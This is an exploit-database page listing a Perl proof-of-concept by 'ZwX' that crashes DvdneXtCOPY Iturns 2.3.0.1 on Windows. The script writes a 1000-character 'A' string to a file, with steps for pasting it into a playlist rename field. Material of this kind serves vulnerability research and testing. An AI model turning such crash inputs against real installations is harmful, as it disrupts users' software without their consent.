[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DvdneXtCOPY Iturns 2.3.0.1 - Crash PoC

Author
ZwX
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24619
Category
dos / poc
Date add
27-11-2015
Platform
windows
#!/bin/perl
#Title DvdneXtCOPY Iturns 2.3.0.1 - (DoS)/Crash PoC
#Author : ZwX
#Date: 10/11/2015
#Vendor : http://www.dvdnextcopyiturns.com/
#Tested Os : Windows XP sp3 & Windows 7

print "1. Open Dvdnextcopyiturns.exe\n";
print "2. Go Menu Edit -> Create New Playlist.\n";
print "3. Click NewPlayList0 And Rename.\n";
print "4. Paste it the AAAA....string And Press Enter.\n";
print "5. Software will Crash.\n";

my $DoS = "\x41" x 1000;

open(MYFILE,'>>File.txt');
print MYFILE $DoS;
close(MYFILE);

print "PoC By ZwX";

#  0day.today [2024-11-15]  #